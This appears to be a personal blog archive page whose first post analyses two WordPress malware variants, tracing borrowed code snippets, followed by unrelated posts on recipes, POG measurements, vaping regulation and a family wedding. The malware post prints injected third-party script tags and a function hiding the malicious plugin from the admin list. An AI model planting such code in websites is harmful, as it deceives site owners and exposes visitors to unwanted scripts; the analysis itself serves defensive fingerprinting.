The Genealogy of Malware

While working on Jetpack Security, one thing I have a greater opportunity than most to do is inspect naughty bits of code that get injected into a user’s site.

One that I stumbled upon this past week reminded me of another from a bit ago — I can’t say precisely what reminded me of it, but my brain connected the two. So I looked back to find the prior infection and this is what turned up:

https://www.diffchecker.com/MYId3pFX

Clearly — a number of similarities between the two files. Of the four hundred plus lines in question, only fifty or so contain any changes, and most of those are namespace changes — changing mont to ccode, or perhaps some subtle refinements on how it detects the remote visitor’s IP address.

One of the most interesting aspects — to me anyways — is tracing the source of various snippets used in the code.

Good artists copy. Great artists steal.

Steve Jobs, misattributing a quotation to Pablo Picasso

So firstly, when skimming the code, around line 20, I found the following:

add_filter('plugin_action_links_'.plugin_basename(__FILE__), 'salcode_add_plugin_page_settings_link');
function salcode_add_plugin_page_settings_link( $links ) {
	$links[] = '<a href="' .
		admin_url( 'options-general.php?page=monit' ) .
		'">' . __('Settings') . '</a>';
	return $links;
}

Huh — it references salcode — I know that namespace, it’s commonly used by Sal Ferrarello! Figuring it may have been lifted off an article he’d written, I reached out to check. Sure enough, he had a 2014 article called “WordPress Plugin Add Settings Link” that he pointed me towards — and sure enough, the code was a straight copy/paste job in the Monitization variant. In the Custom Code variant of the malware, it was tweaked to be namespaced a bit further (changing the trailing link to ccode, but the similarities are still there.

We also can glean a bit from the tags that the code tries to inject. The original attempts:

<script type="text/javascript" src="//ofgogoatan.com/apu.php?zoneid=3260072" async data-cfasync="false"></script>
<script src="https://pushsar.com/pfe/current/tag.min.js?z=3260077" data-cfasync="false" async></script>
<script type="text/javascript" src="//inpagepush.com/400/3324386" data-cfasync="false" async="async"></script>

Where the latter Custom Code implementation attempts:

<script>(function(s,u,z,p){s.src=u,s.setAttribute('data-zone',z),p.appendChild(s);})(document.createElement('script'),'https://iclickcdn.com/tag.min.js',3388587,document.body||document.documentElement)</script>
<script src=\"https://propu.sh/pfe/current/tag.min.js?z=3388595\" data-cfasync=\"false\" async></script>
<script type=\"text/javascript\" src=\"//inpagepush.com/400/3388600\" data-cfasync=\"false\" async=\"async\"></script>

Beside the swap from which quotes need escaping due to single vs double in the wrapping string, we can see a couple notable bits:

  • The first tag seems to have been swapped out in its entirety.
  • The second tag seems to have swapped from pushsar.com to propu.sh — with the general url structure remaining the same. This can indicate the service just changed domains, and kept everything else business as usual.
  • The last tag remained as before — inpagepush.com — but just changing the identifier on the end.

A bit later on, we can find several instances where the mont namespace (possibly typo’d from monit) was not changed to ccode

    register_setting( 'ccode-settings', 'default_mont_options' );
if(get_option('default_mont_options') !=='on')

At the end of the file, we’re confronted with this bit:

function hide_plugin_trickspanda() {
  global $wp_list_table;
  $hidearr = array('monit.php');
  $myplugins = $wp_list_table->items;
  foreach ($myplugins as $key => $val) {
    if (in_array($key,$hidearr)) {
      unset($wp_list_table->items[$key]);
    }
  }
}

Here again, we’ve got a strong hint from the namespace, trickspanda. So in this case, it came from an article that Hardeep Asrani wrote on Tricks Panda — again, back in 2014. The Monitization variant didn’t seem to change the namespace, leaving it as trickspanda, but the later Custom Code variant swapped it out to ccode.

Finally, at the conclusion of the Custom Code variant (not present in the original) we can see the following:

        function getVisIpAddr_ccode() { 
      
    if (!empty($_SERVER['HTTP_CLIENT_IP'])) { 
        return $_SERVER['HTTP_CLIENT_IP']; 
    } 
    else if (!empty($_SERVER['HTTP_X_FORWARDED_FOR'])) { 
        return $_SERVER['HTTP_X_FORWARDED_FOR']; 
    } 
    else { 
        return $_SERVER['REMOTE_ADDR']; 
    } 
}

As it is, this seems to have been lifted from a Geeks For Geeks article dated May 2019. The code uses it up above to handle instances where traffic comes through a load balancer or proxy or the like, with original IP addresses in the header. Interestingly enough, for anyone else who has a need for similar functionality, WordPress Core ships with a similar function already, get_unsafe_client_ip().

So what have we found? Code gets reused, a lot. Old tutorials from 2014 can still offer information going strong years afterwards. Be wise what bits of bad code you use to fingerprint it and identify future infections, as it’s far better to find the unremarkable but unique bits, than the bits they may change to conceal it from future iterations.

Star Wars Galaxy’s Edge Set Dressing

Here’s a bunch of photos I took last week at Star Wars Galaxy’s Edge – Black Spire Outpost in Disneyland. I thought they may be useful for anyone trying to build a similar thematic structure, either for dressing up a home theater room, or just to add some spice to a family room.

So that I don’t lose it: Stifado Recipe

Ingredients: 

  • 2-3 lbs beef, cubed
  • 2-3 lbs pearled onions
  • 1 large yellow onion, chopped
  • 1 28 oz can tomatoes
  • 1 cup dry red wine
  • ¼ cup red wine vinegar
  • ⅓ cup olive oil
  • 3 cloves garlic, bruised
  • 1 tsp sugar
  • Spice bag:
    • 2 bay leaves
    • 1 tablespoon allspice berries
    • 2 3-inch cinnamon sticks
  1. In a stew pot / dutch oven, over medium-low heat, add the chopped onion, half the olive oil, and ¼ cup water.  Cook until the wayer has evaporated and the onion is soft and translucent, about 10 minutes.
  2. To the onions, add the garlic and tomatoes.  Cook, stirring, until the sauce is thick, about 20 minutes.
  3. Rinse the beef, drain, pat dry.  Season lightly with salt and pepper.  Heat the remaining olive oil in a skillet until hot.  Brown the beef over high heat, add to the tomato sauce.
  4. Add the red wine to the skillet to deglaze, and bring to a boil while scraping up any fond from the bottom of the pan.  Add the pearled onions and sugar, and cook over medium-high heat, stirring, until the wine is reduced to a glaze and the onions are lightly browned, about 5 minutes.
  5. Add 3 tablespoons of the red wine vinegar to the onions, and bring to a boil.
  6. Add the spice bag and the onions and wine sauce to the beef and tomato sauce mixture.
  7. Cover and cook over low heat for 2-2½ hours.

 

The Dimensions of POGs

Because of reasons, I’ve had cause to dig out my old POG collection and take detailed measurements of them.  Here’s what I’ve come up with:

A POG Milkcap measures:

  • 41.37 mm or 1.6285 inches in diameter.
  • 1.25 mm or 0.0490 inches in thickness.
  • Forty POGs weigh 1.65 oz or ~0.041 oz per POG.
  • Forty POG measure 2.0310 inches in thickness

An off-brand Slammer is:

  • 42.80 mm or 1.6850 inches in diameter.
  • 5.91 mm or 0.235 inches in thickness.
  • 0.30 oz.

So, a Slammer is approximately 4-5 POGs in thickness, about 1.5mm larger in diameter, and weighs approximately 7-8 times as much as an individual POG.

 

When Mike Pence Comes to Your Alma Mater

I’ll be writing a similar letter to my alma mater’s leadership shortly.

Very disappointed right now.

Grace Leuenberger

caleb-woods-166819.jpgBelow is a letter I sent to my alma mater. I am sharing it here not because I want to make people mad, but because I spent four years hardly ever discussing my political views as a student. I believe the choice to bring Mike Pence to our college is short-sighted, and that many wise, remarkable individuals could have better aligned with the viewpoints and values of the college, its students, its staff, and its alumni. I care about my college too much not be disappointed and worried about the implications this invitation has. I invite respectful dialogue and alternative viewpoints in the comments below. 


Dear Grove City College leadership,

I send this letter today with a desire to respectfully disagree with the recent decision to invite Vice President Michael Pence to speak at this year’s Commencement exercises. Though I recognize that my letter will not alter the decision or…

View original post 1,424 more words

Chicken Tender Wrap

Chicken Tender Wrap

  • Servings: 1
  • Difficulty: Easy
  • Print

Food of the Gods

One of the best things about my college experience at Grove City was the one unique, delectable item on the menu that — to date — I’ve never seen quite duplicated elsewhere.  So for any other Grovers out there that miss the taste of the Chicken Tender Wrap, here’s what I’ve come up with as a pretty darn close approximation.

Credit: Angela Starosta and Matt Schiavone for help piecing back together the recipe.

Ingredients

  • 1 large burrito-size tortilla
  • Diced plum tomatoes
  • Chopped iceberg lettuce
  • 2 Chicken Tenders
  • Ranch dressing
  • Hot sauce (optional)
  • White rice
  • Shredded mild cheddar cheese

Directions

  1. Put two frozen chicken tenders in a microwave safe bowl, and microwave for 1m30.
  2. Put the tortilla wrap you’re using on a plate.  Spread some diced tomatoes and chopped lettuce as a base.
  3. Take the (now hot) chicken out of the microwave, and put it in some hot oil in a skillet over medium heat for about 30-45 seconds per side.
  4. Take the chicken tenders out of the oil, put them on a cutting board, and chop them into maybe ½” chunks.
  5. In the same microwave safe bowl, put approximately equal quantities of white rice, and then shredded cheddar cheese in, and microwave for 1m30.
  6. Spread the chicken on top of the lettuce on the wrap.  Add your desired quantities of ranch dressing and hot sauce.
  7. Take the melted cheese and rice out of the microwave and combine it with a spoon until it’s mixed.  Add this on top of the chicken.
  8. Wrap, folding the edges, and slice it on a bias.  Enjoy!

Disclaimer: You’ll want a bigger tortilla than I’m using in the pictures.  I wound up having way too much stuff in it, and had to split it into two wraps after trying to wrap it.

Kiri Kiri Basara, a lesson in domains

Howdy!  If you’re here, one of two things happened.

Either you follow me on social media or my blog and found this new post, or you’re an anime fan watching Occultic;Nine, and saw the domain kirikiribasara.com in episode one and tried typing it into a web browser.  That domain — for now — redirects to here.

Here begins the lesson:

If you’re ever using a domain name in a movie, or a tv show, or in a presentation — any form, really — do yourself a favor and make sure you buy the domain before you go live.

It’ll cost you like $12, tops.  If your show flops, no big deal.  You don’t need to renew it for a subsequent year.  But if it takes off — or even if someone pulls up the domain just right after airtime, it’s a great tool to engage your users.

Or, you could not buy it, and some rando on the internet (hi there) can scoop the domain up for $12 on Google Domains.  Or cheaper if I wanted to go elsewhere.

Also, if you would like to start your own affiliate blog (like the domain was used for in the anime), I’d suggest building at WordPress.com!

As an aside, I’m not really looking to sell the domain, I just think it’s funny, but if anyone does desperately want the domain to run some sort of fan-forum or if the show’s producers are interested, feel free to drop me a line — the contact form on this site should work, and I’m fairly easy to reach on social media. 🙂

On the FDA and E Cigarettes

DISCLAIMER: While I may enjoy a rare cigar or pipe of tobacco perhaps once or twice per year, I don’t regularly consume tobacco products or nicotine. This post is more my musings on the bureaucracy and workings of the federal government.

Yesterday, the Food and Drug Administration (FDA) expanded its regulation authority to include “Vaporizers, vape pens, hookah pens, electronic cigarettes (e-cigs), and e-pipes are some of the many types of Electronic Nicotine Delivery Systems (ENDS)”.

I have concerns.

According to their press release,

Examples of components and parts of ENDS include, but are not limited to:

  • E-liquids
  • A glass or plastic vial container of e-liquid
  • Cartridges
  • Atomizers
  • Certain batteries
  • Cartomizers and clearomizers
  • Digital display or lights to adjust settings
  • Tank systems
  • Drip tips
  • Flavorings for ENDS
  • Programmable software

So, in short, it’s regulating all of the paraphernalia associated with vaping, and not merely the nicotine itself.

This is concerning to me.

Back in my college days, I used to smoke a (tobacco) pipe and cigars on a weekly basis with other students.  It was a communal event, and I learned to blow smoke rings.  As I’ve grown in the decade since then, I’ve lost the inclination to smoke, and really have no desire for nicotine.  I’ll occasionally smoke a pipe socially with friends once or twice a year, but I do enjoy blowing smoke rings.

As such, I own an electronic cigarette, and I purchased a quart of food-grade USP Propylene Glycol — the base liquid that most suppliers use when making liquid for vaping — and I’ll occasionally use it to blow smoke rings in my office.  No nicotine, no flavorings.

By my understanding, the FDA’s regulation of E-liquids has no limitation to “We only regulate E-liquids that contain nicotine” — in fact, they even state explicitly that:

If the tobacco product manufacturer submits a self-certification statement to FDA that the newly-regulated tobacco product does not contain nicotine (and that the manufacturer has data to support this assertion), then an alternate statement must be used on product packages and advertisements:

“This product is made from tobacco.”

Keep in mind that they are also broadly defining “Tobacco Product” to include all ENDS including all E-liquids and cartridges, atomizers, and even certain batteries. They must be labeled (falsely) that it is made from tobacco?

This feels like a significant overreach.

It strikes me that a similar regulatory effect could be accomplished, simply by exclusively regulating exclusively substances that contain nicotine. What is gained by having the Food and Drug Administration regulating the batteries that power vaporizers? Regulate the nicotine. If someone’s selling electronic cigarettes that come preloaded with nicotine? Sure, regulate that.  But leave the rest alone.

Two Weddings, One Family

I attended two weddings in the family this past weekend.  Two cousins, both on my mom’s side, tied the knot.

Saturday was a beautiful outdoor wedding at a farm in the countryside.  It was about a four hour drive away, which made it into a bit of an interesting day trip, but mostly uneventful.

Sunday was a much easier affair to make it to.  A scant fourteen minute drive from our house, a “come as you are” ceremony.  Much easier to pull off with a seven month and three year old in tow.

And yet some members of the family chose not to attend.

Some members of the family who just drove eight hours round trip to attend another cousin’s wedding didn’t attend.

Why?

It was a gay (or, more specifically, lesbian) wedding.

View this post on Instagram

❤️❤️❤️ #emandaud

A post shared by »«erin»« (@xtristatex) on

And it ranks up there in one of the most charming weddings I’ve ever attended.  The schedule on the program was titled “The Gay Agenda,” and they made jokes about “If this isn’t your first gay wedding, please keep the Bernie chatter to a minimum,” “Now that you’re all attending a gay wedding, congratulations, you’re all gay too,” and even “By the authority vested in me by Obergefell v. Hodges

My mind is just utterly blown at trying to comprehend the mindset that feels it’s more important to not attend a non-religious marriage ceremony.  If you’re Catholic, would you also refuse to attend the wedding of a cousin who was previously divorced and is now getting remarried?  Or do you only attend religious wedding ceremonies presided over by your own church?

I mean — what’s the thinking behind this? “If only I don’t attend their wedding, they’ll recognize the error of their ways, and abandon their sinful plan to marry the person that they want to spend the rest of their lives with?”

(btw, I’m pretty sure the bible doesn’t say anything about gay marriage, all the verses deal with the consummation, and I’m pretty dang sure you’re not invited to that part)

In the end, if I’m going to screw up in this life, I want it to be for loving and accepting people, not making them feel unwelcome or judged.  That’s my Pascal’s Wager. And that’s what I believe the message of the gospel is. The message of the Christ who dined with prostitutes.

Don’t approve of gay marriage?  That’s cool, don’t get gay married. 👍

But to not attend feels spiteful and unkind and wrong.

And I’m left feeling disappointed.